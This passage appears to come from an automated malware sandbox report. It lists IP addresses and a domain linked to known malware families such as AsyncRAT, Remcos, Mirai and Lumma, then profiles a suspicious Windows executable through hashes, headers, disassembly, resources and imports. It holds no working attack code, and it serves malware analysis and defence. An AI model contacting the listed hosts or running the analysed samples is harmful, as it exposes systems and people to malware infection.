                                                                                  EPMTelecomunicacionesSAESPCOs0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                  • 181.131.217.244
                                                                                  hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                  • 181.131.217.244
                                                                                  SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                  • 181.131.217.244
                                                                                  QU4rXM7CiL.exeGet hashmaliciousRemcosBrowse
                                                                                  • 181.131.217.244
                                                                                  ppc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 191.98.81.24
                                                                                  x86.elfGet hashmaliciousMiraiBrowse
                                                                                  • 190.29.49.250
                                                                                  Josho.arm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 181.138.92.50
                                                                                  Josho.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 190.70.10.221
                                                                                  la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 181.139.135.210
                                                                                  4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                                  • 181.131.217.244
                                                                                  AMAZON-02UShCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.49
                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                  • 18.238.49.124
                                                                                  file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                  • 45.112.123.126
                                                                                  jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 52.30.223.81
                                                                                  7299_output.vbsGet hashmaliciousUnknownBrowse
                                                                                  • 3.78.28.71
                                                                                  7166_output.vbsGet hashmaliciousAsyncRATBrowse
                                                                                  • 18.197.239.5
                                                                                  phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                                  • 52.219.193.160
                                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                                  • 54.126.45.88
                                                                                  http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                  • 52.49.166.168
                                                                                  http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                  • 52.49.166.168
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0ehCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.50
                                                                                  NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.50
                                                                                  file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                  • 185.166.143.50
                                                                                  http://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onionGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.50
                                                                                  questionable.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.50
                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 185.166.143.50
                                                                                  3jr0P5izLl.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.166.143.50
                                                                                  3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                  • 185.166.143.50
                                                                                  copia111224mp.htaGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.50
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exehCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                    Process:C:\Users\user\Desktop\pPLwX9wSrD.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):979567344
                                                                                    Entropy (8bit):0.04446253531927003
                                                                                    Encrypted:false
                                                                                    SSDEEP:
                                                                                    MD5:BFE1D6A6FB7A4B19F7B32D9FA6F529B4
                                                                                    SHA1:D03151ABB594C66390E0EEEA2E512E8D97E9B36E
                                                                                    SHA-256:3B616C5242CCB77FFD37EBE1E229C38D69BA52B5AA3AD244A5A251D88A6169FD
                                                                                    SHA-512:C66ED6F768A02028CDC149D104052B544E9B12A14A19DE48EC76D8412D43FA8B3F7BF01F5B50E1BB8DDAE69844C40603AA194C87E3773780443162EF78D3E402
                                                                                    Malicious:false
                                                                                    Joe Sandbox View:
                                                                                    • Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse
                                                                                    Reputation:low
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........UR..;...;...;.K.d...;.2."...;...f...;.F.4...;.F.d.q.;.......;...[...;._."...;.K.f...;...:...;.F.[.D.;.F.g...;.$.e...;.F.a...;.Rich..;.................PE..L...xz.V......................#......0............@...........................0......................................&..........@.........!.........................0...................................@...............$.......@....................text...U........................... ..`.rdata..{...........................@..@.data........0...$..................@....rsrc.....!.......!..@..............@..@........................................................................................................................................................................................................................................................................................................................
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):2.523990419172251
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:pPLwX9wSrD.exe
                                                                                    File size:10'485'760 bytes
                                                                                    MD5:1492e1506afedad20933ae244cf658d1
                                                                                    SHA1:db68cd234205c628ebf3a8329246baf3cdc10ead
                                                                                    SHA256:8ee7bb70506574eb0ba1bffc0bafd993c707d01e54385ca83fb3f731521a9298
                                                                                    SHA512:9fe92f173fa8cb453eeb4bb40abf78164638d15fe6ffcc8aaf8c2f73e22f02b2256d26f50f73fa5f5ef246cdf0d3e3df32576372b20e8fb7ef61d73792ffa80e
                                                                                    SSDEEP:49152:S9BlUVJsBsiK9d3MC+qX+EF+Zx6bwMKexczvm4:S9BlEsWl9d3MChfzbwMKemO4
                                                                                    TLSH:4DB6AE22B6C0C147EAD25070D296E7F1A1683E39E7412987B3C07E9FB276EC1593B527
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........UR..;...;...;.K.d...;.2."...;...f...;.F.4...;.F.d.q.;.......;...[...;._."...;.K.f...;...:...;.F.[.D.;.F.g...;.$.e...;.F.a...;
                                                                                    Icon Hash:f1a58babada68603
                                                                                    Entrypoint:0x4830cf
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:
                                                                                    Time Stamp:0x56A87A78 [Wed Jan 27 08:06:16 2016 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:e52615253ba93e77e88da2201bcab98a
                                                                                    Instruction
                                                                                    push 00000060h
                                                                                    push 004D5458h
                                                                                    call 00007F1BAC7F4B06h
                                                                                    mov edi, 00000094h
                                                                                    mov eax, edi
                                                                                    call 00007F1BAC7EF99Eh
                                                                                    mov dword ptr [ebp-18h], esp
                                                                                    mov esi, esp
                                                                                    mov dword ptr [esi], edi
                                                                                    push esi
                                                                                    call dword ptr [004C14E8h]
                                                                                    mov ecx, dword ptr [esi+10h]
                                                                                    mov dword ptr [004ED0FCh], ecx
                                                                                    mov eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [004ED108h], eax
                                                                                    mov edx, dword ptr [esi+08h]
                                                                                    mov dword ptr [004ED10Ch], edx
                                                                                    mov esi, dword ptr [esi+0Ch]
                                                                                    and esi, 00007FFFh
                                                                                    mov dword ptr [004ED100h], esi
                                                                                    cmp ecx, 02h
                                                                                    je 00007F1BAC7F34BEh
                                                                                    or esi, 00008000h
                                                                                    mov dword ptr [004ED100h], esi
                                                                                    shl eax, 08h
                                                                                    add eax, edx
                                                                                    mov dword ptr [004ED104h], eax
                                                                                    xor esi, esi
                                                                                    push esi
                                                                                    mov edi, dword ptr [004C1488h]
                                                                                    call 00007F1BAC7C348Ch
                                                                                    dec ebp
                                                                                    pop edx
                                                                                    jne 00007F1BAC7F34D1h
                                                                                    mov ecx, dword ptr [eax+3Ch]
                                                                                    add ecx, eax
                                                                                    cmp dword ptr [ecx], 00004550h
                                                                                    jne 00007F1BAC7F34C4h
                                                                                    movzx eax, word ptr [ecx+18h]
                                                                                    cmp eax, 0000010Bh
                                                                                    je 00007F1BAC7F34D1h
                                                                                    cmp eax, 0000020Bh
                                                                                    je 00007F1BAC7F34B7h
                                                                                    mov dword ptr [ebp-1Ch], esi
                                                                                    jmp 00007F1BAC7F34D9h
                                                                                    cmp dword ptr [ecx+00000084h], 0Eh
                                                                                    jbe 00007F1BAC7F34A4h
                                                                                    xor eax, eax
                                                                                    cmp dword ptr [ecx+000000F8h], esi
                                                                                    jmp 00007F1BAC7F34C0h
                                                                                    cmp dword ptr [ecx+74h], 0Eh
                                                                                    jbe 00007F1BAC7F3494h
                                                                                    xor eax, eax
                                                                                    cmp dword ptr [ecx+000000E8h], esi
                                                                                    setne al
                                                                                    mov dword ptr [ebp-1Ch], eax
                                                                                    Programming Language:
                                                                                    • [ASM] VS2003 (.NET) SP1 build 6030
                                                                                    • [ C ] VS2003 (.NET) SP1 build 6030
                                                                                    • [C++] VS2003 (.NET) build 3077
                                                                                    • [C++] VS2003 (.NET) SP1 build 6030
                                                                                    • [EXP] VS2003 (.NET) SP1 build 6030
                                                                                    • [RES] VS2003 (.NET) build 3077
                                                                                    • [LNK] VS2003 (.NET) SP1 build 6030
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0xe26f00x18b.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xdf4b00x140.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xef0000x219a18.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xc1a300x1c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xd9a900x40.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xc10000xa24.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xdf4000x40.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000xbfd550xbfe00a86b6c827e5e7e0cf5fc9c41a25e4deaFalse0.4546582349348534data6.349271524607046IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0xc10000x2187b0x21a009e4eab11d2823d639daa51b6b83eccfbFalse0.3397784038104089data5.912662755924659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xe30000xbb140x240065699f99584db3dd9db5aacc00e8c82dFalse0.3504774305555556data4.5108554971453305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0xef0000x219a180x219c0014aa7097ae14d9835016ab88acd68716unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_CURSOR0xefdd00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"KoreanNorth Korea0.4805194805194805
                                                                                    RT_CURSOR0xefdd00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"KoreanSouth Korea0.4805194805194805
                                                                                    RT_CURSOR0xeff040xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"KoreanNorth Korea0.7
                                                                                    RT_CURSOR0xeff040xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"KoreanSouth Korea0.7
                                                                                    RT_CURSOR0xeffb80x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdKoreanNorth Korea0.36363636363636365
                                                                                    RT_CURSOR0xeffb80x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdKoreanSouth Korea0.36363636363636365
                                                                                    RT_CURSOR0xf00ec0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"KoreanNorth Korea0.35714285714285715
                                                                                    RT_CURSOR0xf00ec0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"KoreanSouth Korea0.35714285714285715
                                                                                    RT_CURSOR0xf02200x134dataKoreanNorth Korea0.37337662337662336
                                                                                    RT_CURSOR0xf02200x134dataKoreanSouth Korea0.37337662337662336
                                                                                    RT_CURSOR0xf03540x134dataKoreanNorth Korea0.37662337662337664
                                                                                    RT_CURSOR0xf03540x134dataKoreanSouth Korea0.37662337662337664
                                                                                    RT_CURSOR0xf04880x134Targa image data 64 x 65536 x 1 +32 "\001"KoreanNorth Korea0.36688311688311687
                                                                                    RT_CURSOR0xf04880x134Targa image data 64 x 65536 x 1 +32 "\001"KoreanSouth Korea0.36688311688311687
                                                                                    RT_CURSOR0xf05bc0x134Targa image data 64 x 65536 x 1 +32 "\001"KoreanNorth Korea0.37662337662337664
                                                                                    RT_CURSOR0xf05bc0x134Targa image data 64 x 65536 x 1 +32 "\001"KoreanSouth Korea0.37662337662337664
                                                                                    RT_CURSOR0xf06f00x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"KoreanNorth Korea0.36688311688311687
                                                                                    RT_CURSOR0xf06f00x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"KoreanSouth Korea0.36688311688311687
                                                                                    RT_CURSOR0xf08240x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"KoreanNorth Korea0.38636363636363635
                                                                                    RT_CURSOR0xf08240x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"KoreanSouth Korea0.38636363636363635
                                                                                    RT_CURSOR0xf09580x134dataKoreanNorth Korea0.44155844155844154
                                                                                    RT_CURSOR0xf09580x134dataKoreanSouth Korea0.44155844155844154
                                                                                    RT_CURSOR0xf0a8c0x134dataKoreanNorth Korea0.4155844155844156
                                                                                    RT_CURSOR0xf0a8c0x134dataKoreanSouth Korea0.4155844155844156
                                                                                    RT_CURSOR0xf0bc00x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdKoreanNorth Korea0.5422077922077922
                                                                                    RT_CURSOR0xf0bc00x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdKoreanSouth Korea0.5422077922077922
                                                                                    RT_CURSOR0xf0cf40x134dataKoreanNorth Korea0.2662337662337662
                                                                                    RT_CURSOR0xf0cf40x134dataKoreanSouth Korea0.2662337662337662
                                                                                    RT_CURSOR0xf0e280x134dataKoreanNorth Korea0.2824675324675325
                                                                                    RT_CURSOR0xf0e280x134dataKoreanSouth Korea0.2824675324675325
                                                                                    RT_CURSOR0xf0f5c0x134dataKoreanNorth Korea0.3246753246753247
                                                                                    RT_CURSOR0xf0f5c0x134dataKoreanSouth Korea0.3246753246753247
                                                                                    RT_BITMAP0xf10900x1d4e8Device independent bitmap graphic, 200 x 200 x 24, image size 120000, resolution 3780 x 3780 px/m0.631939353548817
                                                                                    RT_BITMAP0x10e5780xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80KoreanNorth Korea0.44565217391304346
                                                                                    RT_BITMAP0x10e5780xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80KoreanSouth Korea0.44565217391304346
                                                                                    RT_BITMAP0x10e6300x144Device independent bitmap graphic, 33 x 11 x 4, image size 220KoreanNorth Korea0.37962962962962965
                                                                                    RT_BITMAP0x10e6300x144Device independent bitmap graphic, 33 x 11 x 4, image size 220KoreanSouth Korea0.37962962962962965
                                                                                    RT_ICON0x10e7740x44028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.2361111111111111
                                                                                    RT_ICON0x15279c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colorsKoreanNorth Korea0.34543010752688175
                                                                                    RT_ICON0x15279c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colorsKoreanSouth Korea0.34543010752688175
                                                                                    RT_ICON0x152a840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsKoreanNorth Korea0.543918918918919
                                                                                    RT_ICON0x152a840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsKoreanSouth Korea0.543918918918919
                                                                                    RT_MENU0x152bac0x142dataKoreanNorth Korea0.6149068322981367
                                                                                    RT_MENU0x152bac0x142dataKoreanSouth Korea0.6149068322981367
                                                                                    RT_DIALOG0x152cf00xc6dataKoreanNorth Korea0.6919191919191919
                                                                                    RT_DIALOG0x152cf00xc6dataKoreanSouth Korea0.6919191919191919
                                                                                    RT_DIALOG0x152db80xdadataKoreanNorth Korea0.7477064220183486
                                                                                    RT_DIALOG0x152db80xdadataKoreanSouth Korea0.7477064220183486
                                                                                    RT_DIALOG0x152e940xf4dataKoreanNorth Korea0.6639344262295082
                                                                                    RT_DIALOG0x152e940xf4dataKoreanSouth Korea0.6639344262295082
                                                                                    RT_STRING0x152f880x34dataKoreanNorth Korea0.5576923076923077
                                                                                    RT_STRING0x152f880x34dataKoreanSouth Korea0.5576923076923077
                                                                                    RT_STRING0x152fbc0x66dataKoreanNorth Korea0.8627450980392157
                                                                                    RT_STRING0x152fbc0x66dataKoreanSouth Korea0.8627450980392157
                                                                                    RT_STRING0x1530240x2edataKoreanNorth Korea0.6086956521739131
                                                                                    RT_STRING0x1530240x2edataKoreanSouth Korea0.6086956521739131
                                                                                    RT_STRING0x1530540xe8dataKoreanNorth Korea0.75
                                                                                    RT_STRING0x1530540xe8dataKoreanSouth Korea0.75
                                                                                    RT_STRING0x15313c0x30cdataKoreanNorth Korea0.591025641025641
                                                                                    RT_STRING0x15313c0x30cdataKoreanSouth Korea0.591025641025641
                                                                                    RT_STRING0x1534480x1a8dataKoreanNorth Korea0.4080188679245283
                                                                                    RT_STRING0x1534480x1a8dataKoreanSouth Korea0.4080188679245283
                                                                                    RT_STRING0x1535f00x1d2dataKoreanNorth Korea0.5815450643776824
                                                                                    RT_STRING0x1535f00x1d2dataKoreanSouth Korea0.5815450643776824
                                                                                    RT_STRING0x1537c40x68dataKoreanNorth Korea0.8076923076923077
                                                                                    RT_STRING0x1537c40x68dataKoreanSouth Korea0.8076923076923077
                                                                                    RT_STRING0x15382c0x6edataKoreanNorth Korea0.6272727272727273
                                                                                    RT_STRING0x15382c0x6edataKoreanSouth Korea0.6272727272727273
                                                                                    RT_STRING0x15389c0xb0dataKoreanNorth Korea0.7102272727272727
                                                                                    RT_STRING0x15389c0xb0dataKoreanSouth Korea0.7102272727272727
                                                                                    RT_STRING0x15394c0x322AmigaOS bitmap font "X\271", fc_YSize 28844, 9414 elements, 2nd "\030\264\310\305\265\302\310\262\344\262.", 3rd " "KoreanNorth Korea0.4975062344139651
                                                                                    RT_STRING0x15394c0x322AmigaOS bitmap font "X\271", fc_YSize 28844, 9414 elements, 2nd "\030\264\310\305\265\302\310\262\344\262.", 3rd " "KoreanSouth Korea0.4975062344139651
                                                                                    RT_STRING0x153c700x172AmigaOS bitmap font "X\271", fc_YSize 29895, 9414 elements, 2nd "\210\307\265\302\310\262\344\262.", 3rdKoreanNorth Korea0.5675675675675675
                                                                                    RT_STRING0x153c700x172AmigaOS bitmap font "X\271", fc_YSize 29895, 9414 elements, 2nd "\210\307\265\302\310\262\344\262.", 3rdKoreanSouth Korea0.5675675675675675
                                                                                    RT_STRING0x153de40x24dataKoreanNorth Korea0.4722222222222222
                                                                                    RT_STRING0x153de40x24dataKoreanSouth Korea0.4722222222222222
                                                                                    RT_STRING0x153e080x40dataKoreanNorth Korea0.671875
                                                                                    RT_STRING0x153e080x40dataKoreanSouth Korea0.671875
                                                                                    RT_RCDATA0x153e480x9c27aDelphi compiled form 'TdmMain'0.18977814605775395
                                                                                    RT_RCDATA0x1f00c40x7cf06Delphi compiled form 'TFilePropertiesForm2'0.3699384465070835
                                                                                    RT_MESSAGETABLE0x26cfcc0x2840data0.32278726708074534
                                                                                    RT_MESSAGETABLE0x26f80c0x2840data0.4297360248447205
                                                                                    RT_MESSAGETABLE0x27204c0x2840data0.32754270186335405
                                                                                    RT_GROUP_CURSOR0x27488c0x22Lotus unknown worksheet or configuration, revision 0x2KoreanNorth Korea1.0294117647058822
                                                                                    RT_GROUP_CURSOR0x27488c0x22Lotus unknown worksheet or configuration, revision 0x2KoreanSouth Korea1.0294117647058822
                                                                                    RT_GROUP_CURSOR0x2748b00x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2748b00x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2748c40x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2748c40x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2748d80x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2748d80x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2748ec0x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2748ec0x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749000x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749000x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749140x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749140x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749280x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749280x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x27493c0x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x27493c0x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749500x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749500x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749640x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749640x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749780x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749780x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x27498c0x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x27498c0x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749a00x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749a00x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749b40x14Lotus unknown worksheet or configuration, revision 0x1KoreanNorth Korea1.3
                                                                                    RT_GROUP_CURSOR0x2749b40x14Lotus unknown worksheet or configuration, revision 0x1KoreanSouth Korea1.3
                                                                                    RT_GROUP_ICON0x2749c80x22dataKoreanNorth Korea1.0
                                                                                    RT_GROUP_ICON0x2749c80x22dataKoreanSouth Korea1.0
                                                                                    RT_VERSION0x2749ec0x2ecdataKoreanNorth Korea0.48663101604278075
                                                                                    RT_VERSION0x2749ec0x2ecdataKoreanSouth Korea0.48663101604278075
                                                                                    RT_ANIICON0x274cd80x59eebPC bitmap, Windows 3.x format, 46643 x 2 x 43, image size 368699, cbSize 368363, bits offset 540.948387867402535
                                                                                    RT_ANIICON0x2cebc40x39e54PC bitmap, Windows 3.x format, 29965 x 2 x 41, image size 237438, cbSize 237140, bits offset 540.9939613730285907
                                                                                    DLLImport
                                                                                    WS2_32.dllinet_addr, closesocket, getsockname, send, recv, connect, WSAStartup, gethostbyname, bind, setsockopt, WSACleanup, socket, WSARecv, WSASend, WSACloseEvent, inet_ntoa, WSASocketA, htons, WSAEventSelect, WSACreateEvent, listen, htonl, WSAGetLastError, WSAResetEvent, accept
                                                                                    ODBC32.dll
                                                                                    KERNEL32.dllFreeLibrary, GlobalAlloc, GlobalLock, GlobalAddAtomA, InterlockedDecrement, FreeResource, GlobalFree, GlobalUnlock, lstrcmpW, lstrcatA, GlobalFindAtomA, GlobalGetAtomNameA, SetLastError, MulDiv, FindClose, FindNextFileA, FileTimeToSystemTime, FileTimeToLocalFileTime, FindFirstFileA, GetPrivateProfileIntA, WritePrivateProfileStringA, GetPrivateProfileStringA, InterlockedIncrement, GlobalFlags, LocalAlloc, LocalFree, GlobalReAlloc, GlobalDeleteAtom, TlsGetValue, TlsAlloc, TlsSetValue, LocalReAlloc, TlsFree, FormatMessageA, GlobalSize, CopyFileA, MoveFileA, FlushFileBuffers, LockFile, UnlockFile, SetEndOfFile, GetFileSize, DuplicateHandle, GetVolumeInformationA, GetFullPathNameA, GetShortPathNameA, GetCPInfo, GetOEMCP, SystemTimeToFileTime, SetErrorMode, LocalFileTimeToFileTime, SetFileTime, SetFileAttributesA, GetFileAttributesA, GetFileTime, LocalUnlock, LocalLock, GetTempFileNameA, GetDiskFreeSpaceA, ExitThread, GetTimeFormatA, GetDateFormatA, VirtualProtect, RtlUnwind, GetDriveTypeA, GetStartupInfoA, GetCommandLineA, SetLocalTime, TerminateProcess, HeapSize, QueryPerformanceCounter, UnhandledExceptionFilter, GetTimeZoneInformation, LCMapStringA, LCMapStringW, FatalAppExitA, GetStdHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, SetConsoleCtrlHandler, GetStringTypeA, GetStringTypeW, SetStdHandle, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, IsBadReadPtr, IsBadCodePtr, GetLocaleInfoW, SetEnvironmentVariableA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, LoadLibraryA, CreateThread, UnregisterWaitEx, FlushInstructionCache, GetCurrentDirectoryA, SetCurrentDirectoryA, lstrcpynA, ReleaseMutex, ReleaseSemaphore, CreateSemaphoreA, IsDBCSLeadByte, CreateDirectoryA, SetThreadIdealProcessor, GetQueuedCompletionStatus, WaitForMultipleObjects, PostQueuedCompletionStatus, GetTickCount, SetEvent, SetProcessPriorityBoost, CreateEventA, CreateIoCompletionPort, SwitchToThread, Sleep, HeapReAlloc, VirtualAlloc, HeapValidate, HeapAlloc, VirtualFree, HeapFree, HeapCreate, HeapDestroy, OutputDebugStringA, SuspendThread, ResumeThread, IsDebuggerPresent, DebugBreak, IsBadWritePtr, GetSystemTimeAsFileTime, SetThreadPriority, GetCurrentProcessId, WriteFile, SetFilePointer, GetLocalTime, 